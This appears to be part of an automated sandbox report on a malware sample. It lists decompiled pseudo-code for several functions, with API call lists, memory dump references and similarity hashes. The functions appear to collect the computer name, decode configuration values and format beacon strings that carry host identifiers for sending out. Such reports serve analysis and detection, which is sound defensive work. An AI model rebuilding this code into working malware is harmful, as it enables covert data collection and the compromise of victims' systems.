                                                          Uniqueness Score: -1.00%

                                                          Function 02B958DB, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 37%
                                                          			E02B958DB(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E02B9A71F(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E02B9A734(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                                          0x02b958e0
                                                          0x02b958eb
                                                          0x02b958ed
                                                          0x02b958f3
                                                          0x02b958f5
                                                          0x02b958fa
                                                          0x02b95903
                                                          0x02b95907
                                                          0x02b95910
                                                          0x02b95914
                                                          0x02b95923
                                                          0x02b95916
                                                          0x02b95917
                                                          0x02b9591c
                                                          0x02b9591c
                                                          0x02b95914
                                                          0x02b95907
                                                          0x02b9592c

                                                          APIs
                                                          • GetComputerNameExA.KERNELBASE(00000003,00000000,02B91FA0,74B5F710,00000000,?,?,02B91FA0), ref: 02B958F3
                                                            • Part of subcall function 02B9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02B95595), ref: 02B9A72B
                                                          • GetComputerNameExA.KERNELBASE(00000003,00000000,02B91FA0,02B91FA1,?,?,02B91FA0), ref: 02B95910
                                                            • Part of subcall function 02B9A734: HeapFree.KERNEL32(00000000,00000000,02B95637,00000000,?,?,00000000), ref: 02B9A740
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ComputerHeapName$AllocateFree
                                                          • String ID:
                                                          • API String ID: 187446995-0
                                                          • Opcode ID: 2fb24f7fe01bfcb03846c1d09c7c765f2022a4b8279636a6d05f0c6fa887e67c
                                                          • Instruction ID: cea467fc9429baff348b1648d36890ef1fc0ab560a3ca40510f8fc052bdc45e7
                                                          • Opcode Fuzzy Hash: 2fb24f7fe01bfcb03846c1d09c7c765f2022a4b8279636a6d05f0c6fa887e67c
                                                          • Instruction Fuzzy Hash: 9CF05436640109BFEF22D7999D01FAF76FDDBC5654F6500BAE604E3140EA74DA018B70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B94ECA, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x2b9d23c) == 0) {
						E02B91B42();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x2b9d23c) == 1) {
						_t10 = E02B912E5(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}








                                                          0x02b94ed1
                                                          0x02b94ed2
                                                          0x02b94ed5
                                                          0x02b94f07
                                                          0x02b94f09
                                                          0x02b94f09
                                                          0x02b94ed7
                                                          0x02b94ed8
                                                          0x02b94eed
                                                          0x02b94ef4
                                                          0x02b94ef6
                                                          0x02b94ef6
                                                          0x02b94ef4
                                                          0x02b94ed8
                                                          0x02b94f11

                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(02B9D23C), ref: 02B94EDF
                                                            • Part of subcall function 02B912E5: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,02B94EF2,?), ref: 02B912F8
                                                          • InterlockedDecrement.KERNEL32(02B9D23C), ref: 02B94EFF
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Interlocked$CreateDecrementHeapIncrement
                                                          • String ID:
                                                          • API String ID: 3834848776-0
                                                          • Opcode ID: 8015945edeeb28f6c59788249e16e05271b8ab95cbab54eb19445dbc97396c79
                                                          • Instruction ID: 5a6693cbd1fed06141d8dfd2147de335347071f0f8315659cf348293d94b4b06
                                                          • Opcode Fuzzy Hash: 8015945edeeb28f6c59788249e16e05271b8ab95cbab54eb19445dbc97396c79
                                                          • Instruction Fuzzy Hash: 96E0863125813753AF216BB8DA08B5EFB63EF82B84F0185F5F4CAD1050D710C452D695
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B91AE2, Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 88%
                                                          			E02B91AE2(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}








                                                          0x02b91ae2
                                                          0x02b91aef
                                                          0x02b91af0
                                                          0x02b91af1
                                                          0x02b91af8
                                                          0x02b91b26
                                                          0x02b91b27
                                                          0x02b91b2a
                                                          0x02b91b30
                                                          0x00000000
                                                          0x00000000
                                                          0x02b91b0f
                                                          0x02b91b19
                                                          0x02b91b20
                                                          0x00000000
                                                          0x02b91b11
                                                          0x02b91b14
                                                          0x02b91b34
                                                          0x02b91b16
                                                          0x02b91b16
                                                          0x00000000
                                                          0x02b91b16
                                                          0x02b91b14
                                                          0x02b91b3b
                                                          0x02b91b41
                                                          0x02b91b41
                                                          0x00000000

                                                          APIs
                                                          • Sleep.KERNELBASE(000001F4), ref: 02B91B2A
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: a0acba7d7a3acd3e13e4abd246c4f2aabc530e777e1991cc1688c08604cd98a1
                                                          • Instruction ID: 46c19d4c3645b1dbce672b7547929135a1e6363c7c1b51cc53384ca99ebffdca
                                                          • Opcode Fuzzy Hash: a0acba7d7a3acd3e13e4abd246c4f2aabc530e777e1991cc1688c08604cd98a1
                                                          • Instruction Fuzzy Hash: 2BF01475D12219EBCF00DB98C588AEDB7B8EF08304F1084AAE506A3200E3B46B85DB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 02B9888E, Relevance: 10.7, APIs: 7, Instructions: 237memoryCOMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 95%
                                                          			E02B9888E(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t26;
				signed int _t31;
				signed int _t37;
				char* _t43;
				char* _t44;
				char* _t45;
				char* _t46;
				char* _t47;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t51;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				signed int _t58;
				intOrPtr _t61;
				signed int _t62;
				signed int _t67;
				void* _t69;
				void* _t70;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				signed int _t84;
				signed int _t88;
				signed int _t92;
				void* _t97;
				intOrPtr _t114;

				_t98 = __ecx;
				_t26 =  *0x2b9d2a4; // 0x63699bc3
				if(E02B97145( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x90) {
					 *0x2b9d2d8 = _v8;
				}
				_t31 =  *0x2b9d2a4; // 0x63699bc3
				if(E02B97145( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
					_v12 = 2;
					L62:
					return _v12;
				}
				_t37 =  *0x2b9d2a4; // 0x63699bc3
				if(E02B97145( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
					L60:
					HeapFree( *0x2b9d238, 0, _v16);
					goto L62;
				} else {
					_t97 = _v12;
					if(_t97 == 0) {
						_t43 = 0;
					} else {
						_t92 =  *0x2b9d2a4; // 0x63699bc3
						_t43 = E02B96B2E(_t98, _t97, _t92 ^ 0x724e87bc);
					}
					if(_t43 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
							 *0x2b9d240 = _v8;
						}
					}
					if(_t97 == 0) {
						_t44 = 0;
					} else {
						_t88 =  *0x2b9d2a4; // 0x63699bc3
						_t44 = E02B96B2E(_t98, _t97, _t88 ^ 0x2b40cc40);
					}
					if(_t44 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
							 *0x2b9d244 = _v8;
						}
					}
					if(_t97 == 0) {
						_t45 = 0;
					} else {
						_t84 =  *0x2b9d2a4; // 0x63699bc3
						_t45 = E02B96B2E(_t98, _t97, _t84 ^ 0x3b27c2e6);
					}
					if(_t45 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x2b9d248 = _v8;
						}
					}
					if(_t97 == 0) {
						_t46 = 0;
					} else {
						_t80 =  *0x2b9d2a4; // 0x63699bc3
						_t46 = E02B96B2E(_t98, _t97, _t80 ^ 0x0602e249);
					}
					if(_t46 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x2b9d004 = _v8;
						}
					}
					if(_t97 == 0) {
						_t47 = 0;
					} else {
						_t76 =  *0x2b9d2a4; // 0x63699bc3
						_t47 = E02B96B2E(_t98, _t97, _t76 ^ 0x3603764c);
					}
					if(_t47 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x2b9d02c = _v8;
						}
					}
					if(_t97 == 0) {
						_t48 = 0;
					} else {
						_t72 =  *0x2b9d2a4; // 0x63699bc3
						_t48 = E02B96B2E(_t98, _t97, _t72 ^ 0x2cc1f2fd);
					}
					if(_t48 != 0) {
						_push(_t48);
						_t69 = 0x10;
						_t70 = E02B956FA(_t69);
						if(_t70 != 0) {
							_push(_t70);
							E02B96702();
						}
					}
					if(_t97 == 0) {
						_t49 = 0;
					} else {
						_t67 =  *0x2b9d2a4; // 0x63699bc3
						_t49 = E02B96B2E(_t98, _t97, _t67 ^ 0xb30fc035);
					}
					if(_t49 != 0 && E02B956FA(0, _t49) != 0) {
						_t114 =  *0x2b9d32c; // 0x69b95b0
						E02B923F4(_t114 + 4, _t65);
					}
					if(_t97 == 0) {
						_t50 = 0;
					} else {
						_t62 =  *0x2b9d2a4; // 0x63699bc3
						_t50 = E02B96B2E(_t98, _t97, _t62 ^ 0x372ab5b7);
					}
					if(_t50 == 0) {
						L52:
						_t51 =  *0x2b9d2a8; // 0x3e1a5a8
						_t20 = _t51 + 0x2b9e252; // 0x616d692f
						 *0x2b9d2d4 = _t20;
						goto L53;
					} else {
						_t61 = E02B956FA(0, _t50);
						 *0x2b9d2d4 = _t61;
						if(_t61 != 0) {
							L53:
							if(_t97 == 0) {
								_t53 = 0;
							} else {
								_t58 =  *0x2b9d2a4; // 0x63699bc3
								_t53 = E02B96B2E(_t98, _t97, _t58 ^ 0xd8dc5cde);
							}
							if(_t53 == 0) {
								_t54 =  *0x2b9d2a8; // 0x3e1a5a8
								_t21 = _t54 + 0x2b9e791; // 0x6976612e
								_t55 = _t21;
							} else {
								_t55 = E02B956FA(0, _t53);
							}
							 *0x2b9d340 = _t55;
							HeapFree( *0x2b9d238, 0, _t97);
							_v12 = 0;
							goto L60;
						}
						goto L52;
					}
				}
			}




































                                                          0x02b9888e
                                                          0x02b98891
                                                          0x02b988b1
                                                          0x02b988bf
                                                          0x02b988bf
                                                          0x02b988c4
                                                          0x02b988de
                                                          0x02b98b0d
                                                          0x02b98b14
                                                          0x02b98b1b
                                                          0x02b98b1b
                                                          0x02b988e4
                                                          0x02b98900
                                                          0x02b98afb
                                                          0x02b98b05
                                                          0x00000000
                                                          0x02b98906
                                                          0x02b98906
                                                          0x02b9890b
                                                          0x02b98921
                                                          0x02b9890d
                                                          0x02b9890d
                                                          0x02b9891a
                                                          0x02b9891a
                                                          0x02b9892b
                                                          0x02b9892d
                                                          0x02b98937
                                                          0x02b9893c
                                                          0x02b9893c
                                                          0x02b98937
                                                          0x02b98943
                                                          0x02b98959
                                                          0x02b98945
                                                          0x02b98945
                                                          0x02b98952
                                                          0x02b98952
                                                          0x02b9895d
                                                          0x02b9895f
                                                          0x02b98969
                                                          0x02b9896e
                                                          0x02b9896e
                                                          0x02b98969
                                                          0x02b98975
                                                          0x02b9898b
                                                          0x02b98977
                                                          0x02b98977
                                                          0x02b98984
                                                          0x02b98984
                                                          0x02b9898f
                                                          0x02b98991
                                                          0x02b9899b
                                                          0x02b989a0
                                                          0x02b989a0
                                                          0x02b9899b
                                                          0x02b989a7
                                                          0x02b989bd
                                                          0x02b989a9
                                                          0x02b989a9
                                                          0x02b989b6
                                                          0x02b989b6
                                                          0x02b989c1
                                                          0x02b989c3
                                                          0x02b989cd
                                                          0x02b989d2
                                                          0x02b989d2
                                                          0x02b989cd
                                                          0x02b989d9
                                                          0x02b989ef
                                                          0x02b989db
                                                          0x02b989db
                                                          0x02b989e8
                                                          0x02b989e8
                                                          0x02b989f3
                                                          0x02b989f5
                                                          0x02b989ff
                                                          0x02b98a04
                                                          0x02b98a04
                                                          0x02b989ff
                                                          0x02b98a0b
                                                          0x02b98a21
                                                          0x02b98a0d
                                                          0x02b98a0d
                                                          0x02b98a1a
                                                          0x02b98a1a
                                                          0x02b98a25
                                                          0x02b98a27
                                                          0x02b98a2a
                                                          0x02b98a2b
                                                          0x02b98a32
                                                          0x02b98a34
                                                          0x02b98a35
                                                          0x02b98a35
                                                          0x02b98a32
                                                          0x02b98a3c
                                                          0x02b98a52
                                                          0x02b98a3e
                                                          0x02b98a3e
                                                          0x02b98a4b
                                                          0x02b98a4b
                                                          0x02b98a56
                                                          0x02b98a64
                                                          0x02b98a6e
                                                          0x02b98a6e
                                                          0x02b98a75
                                                          0x02b98a8b
                                                          0x02b98a77
                                                          0x02b98a77
                                                          0x02b98a84
                                                          0x02b98a84
                                                          0x02b98a8f
                                                          0x02b98aa2
                                                          0x02b98aa2
                                                          0x02b98aa7
                                                          0x02b98aad
                                                          0x00000000
                                                          0x02b98a91
                                                          0x02b98a94
                                                          0x02b98a99
                                                          0x02b98aa0
                                                          0x02b98ab2
                                                          0x02b98ab4
                                                          0x02b98aca
                                                          0x02b98ab6
                                                          0x02b98ab6
                                                          0x02b98ac3
                                                          0x02b98ac3
                                                          0x02b98ace
                                                          0x02b98ada
                                                          0x02b98adf
                                                          0x02b98adf
                                                          0x02b98ad0
                                                          0x02b98ad3
                                                          0x02b98ad3
                                                          0x02b98aed
                                                          0x02b98af2
                                                          0x02b98af8
                                                          0x00000000
                                                          0x02b98af8
                                                          0x00000000
                                                          0x02b98aa0
                                                          0x02b98a8f

                                                          APIs
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,02B95D25,?,63699BC3,?,02B95D25,63699BC3,?,02B95D25,63699BC3,00000005,02B9D00C,00000008), ref: 02B98933
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,02B95D25,?,63699BC3,?,02B95D25,63699BC3,?,02B95D25,63699BC3,00000005,02B9D00C,00000008), ref: 02B98965
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,02B95D25,?,63699BC3,?,02B95D25,63699BC3,?,02B95D25,63699BC3,00000005,02B9D00C,00000008), ref: 02B98997
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,02B95D25,?,63699BC3,?,02B95D25,63699BC3,?,02B95D25,63699BC3,00000005,02B9D00C,00000008), ref: 02B989C9
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,02B95D25,?,63699BC3,?,02B95D25,63699BC3,?,02B95D25,63699BC3,00000005,02B9D00C,00000008), ref: 02B989FB
                                                          • HeapFree.KERNEL32(00000000,02B95D25,02B95D25,?,63699BC3,?,02B95D25,63699BC3,?,02B95D25,63699BC3,00000005,02B9D00C,00000008,?,02B95D25), ref: 02B98AF2
                                                          • HeapFree.KERNEL32(00000000,?,02B95D25,?,63699BC3,?,02B95D25,63699BC3,?,02B95D25,63699BC3,00000005,02B9D00C,00000008,?,02B95D25), ref: 02B98B05
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: f6e9d256ee8e38e22d48e880a17215f25bd94dc72010fd77d296797a002c27f4
                                                          • Instruction ID: 6e0291b96635772c1088958245f8445be43302c483f21cd3e14299a43c859a9c
                                                          • Opcode Fuzzy Hash: f6e9d256ee8e38e22d48e880a17215f25bd94dc72010fd77d296797a002c27f4
                                                          • Instruction Fuzzy Hash: 6F717C71E40106AFCF10EBBADE88D5BB7EEEB493847690DB5E502D7144E731D9528B20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B91F13, Relevance: 34.7, APIs: 23, Instructions: 201memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 66%
                                                          			E02B91F13(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x2b9d018; // 0xf1c1aee9
				asm("bswap eax");
				_t27 =  *0x2b9d014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x2b9d010; // 0xd8d2f808
				asm("bswap eax");
				_t29 = E02B9D00C; // 0xeec43f25
				asm("bswap eax");
				_t30 =  *0x2b9d2a8; // 0x3e1a5a8
				_t3 = _t30 + 0x2b9e633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d15e, _t29, _t28, _t27, _t26,  *0x2b9d02c,  *0x2b9d004, _t25);
				_t33 = E02B956CD();
				_t34 =  *0x2b9d2a8; // 0x3e1a5a8
				_t4 = _t34 + 0x2b9e673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37;
				_t96 = E02B958DB(_t91);
				if(_t96 != 0) {
					_t83 =  *0x2b9d2a8; // 0x3e1a5a8
					_t6 = _t83 + 0x2b9e8d4; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x2b9d238, 0, _t96);
				}
				_t97 = E02B9A199();
				if(_t97 != 0) {
					_t78 =  *0x2b9d2a8; // 0x3e1a5a8
					_t8 = _t78 + 0x2b9e8dc; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x2b9d238, 0, _t97);
				}
				_t98 =  *0x2b9d32c; // 0x69b95b0
				_a32 = E02B94622(0x2b9d00a, _t98 + 4);
				_t42 =  *0x2b9d2d0; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x2b9d2a8; // 0x3e1a5a8
					_t11 = _t74 + 0x2b9e8b6; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x2b9d2cc; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x2b9d2a8; // 0x3e1a5a8
					_t13 = _t71 + 0x2b9e88d; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x2b9d238, 0, 0x800);
					if(_t100 != 0) {
						E02B9518F(GetTickCount());
						_t50 =  *0x2b9d32c; // 0x69b95b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x2b9d32c; // 0x69b95b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x2b9d32c; // 0x69b95b0
						_t103 = E02B91BB6(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x2b9c28c);
							_push(_t103);
							_t62 = E02B9361A();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E02B96777(0xffffffffffffffff, _t100, _v28, _v24);
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E02B96761();
								}
								HeapFree( *0x2b9d238, 0, _v44);
							}
							HeapFree( *0x2b9d238, 0, _t103);
						}
						HeapFree( *0x2b9d238, 0, _t100);
					}
					HeapFree( *0x2b9d238, 0, _a24);
				}
				HeapFree( *0x2b9d238, 0, _t105);
				return _a12;
			}
















































                                                          0x02b91f13
                                                          0x02b91f13
                                                          0x02b91f13
                                                          0x02b91f18
                                                          0x02b91f1e
                                                          0x02b91f28
                                                          0x02b91f2a
                                                          0x02b91f2a
                                                          0x02b91f37
                                                          0x02b91f42
                                                          0x02b91f45
                                                          0x02b91f50
                                                          0x02b91f53
                                                          0x02b91f58
                                                          0x02b91f5b
                                                          0x02b91f60
                                                          0x02b91f63
                                                          0x02b91f6f
                                                          0x02b91f7c
                                                          0x02b91f7e
                                                          0x02b91f84
                                                          0x02b91f89
                                                          0x02b91f94
                                                          0x02b91f96
                                                          0x02b91f99
                                                          0x02b91fa0
                                                          0x02b91fa4
                                                          0x02b91fa6
                                                          0x02b91fab
                                                          0x02b91fb7
                                                          0x02b91fb9
                                                          0x02b91fc5
                                                          0x02b91fc7
                                                          0x02b91fc7
                                                          0x02b91fd2
                                                          0x02b91fd6
                                                          0x02b91fd8
                                                          0x02b91fdd
                                                          0x02b91fe9
                                                          0x02b91feb
                                                          0x02b91ff7
                                                          0x02b91ff9
                                                          0x02b91ff9
                                                          0x02b91fff
                                                          0x02b92012
                                                          0x02b92016
                                                          0x02b9201d
                                                          0x02b92020
                                                          0x02b92025
                                                          0x02b92030
                                                          0x02b92032
                                                          0x02b92035
                                                          0x02b92035
                                                          0x02b92037
                                                          0x02b9203e
                                                          0x02b92041
                                                          0x02b92046
                                                          0x02b92050
                                                          0x02b92052
                                                          0x02b9205a
                                                          0x02b92073
                                                          0x02b92077
                                                          0x02b92083
                                                          0x02b92088
                                                          0x02b92091
                                                          0x02b920a2
                                                          0x02b920a6
                                                          0x02b920af
                                                          0x02b920b5
                                                          0x02b920c2
                                                          0x02b920cf
                                                          0x02b920d5
                                                          0x02b920e1
                                                          0x02b920e7
                                                          0x02b920e8
                                                          0x02b920ed
                                                          0x02b920f3
                                                          0x02b920f9
                                                          0x02b92100
                                                          0x02b92107
                                                          0x02b9210d
                                                          0x02b92114
                                                          0x02b92118
                                                          0x02b92123
                                                          0x02b92128
                                                          0x02b9212e
                                                          0x02b92137
                                                          0x02b92137
                                                          0x02b92148
                                                          0x02b92148
                                                          0x02b92157
                                                          0x02b92157
                                                          0x02b92166
                                                          0x02b92166
                                                          0x02b92178
                                                          0x02b92178
                                                          0x02b92187
                                                          0x02b92198

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 02B91F2A
                                                          • wsprintfA.USER32 ref: 02B91F77
                                                          • wsprintfA.USER32 ref: 02B91F94
                                                          • wsprintfA.USER32 ref: 02B91FB7
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 02B91FC7
                                                          • wsprintfA.USER32 ref: 02B91FE9
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 02B91FF9
                                                          • wsprintfA.USER32 ref: 02B92030
                                                          • wsprintfA.USER32 ref: 02B92050
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02B9206D
                                                          • GetTickCount.KERNEL32 ref: 02B9207D
                                                          • RtlEnterCriticalSection.NTDLL(069B9570), ref: 02B92091
                                                          • RtlLeaveCriticalSection.NTDLL(069B9570), ref: 02B920AF
                                                            • Part of subcall function 02B91BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,02B920C2,?,069B95B0), ref: 02B91BE1
                                                            • Part of subcall function 02B91BB6: lstrlen.KERNEL32(?,?,?,02B920C2,?,069B95B0), ref: 02B91BE9
                                                            • Part of subcall function 02B91BB6: strcpy.NTDLL ref: 02B91C00
                                                            • Part of subcall function 02B91BB6: lstrcat.KERNEL32(00000000,?), ref: 02B91C0B
                                                            • Part of subcall function 02B91BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02B920C2,?,069B95B0), ref: 02B91C28
                                                          • StrTrimA.SHLWAPI(00000000,02B9C28C,?,069B95B0), ref: 02B920E1
                                                            • Part of subcall function 02B9361A: lstrlen.KERNEL32(069B9A78,00000000,00000000,7742C740,02B920ED,00000000), ref: 02B9362A
                                                            • Part of subcall function 02B9361A: lstrlen.KERNEL32(?), ref: 02B93632
                                                            • Part of subcall function 02B9361A: lstrcpy.KERNEL32(00000000,069B9A78), ref: 02B93646
                                                            • Part of subcall function 02B9361A: lstrcat.KERNEL32(00000000,?), ref: 02B93651
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 02B92100
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 02B92107
                                                          • lstrcat.KERNEL32(00000000,?), ref: 02B92114
                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 02B92118
                                                            • Part of subcall function 02B96777: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74B481D0), ref: 02B96829
                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 02B92148
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02B92157
                                                          • HeapFree.KERNEL32(00000000,00000000,?,069B95B0), ref: 02B92166
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 02B92178
                                                          • HeapFree.KERNEL32(00000000,?), ref: 02B92187
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
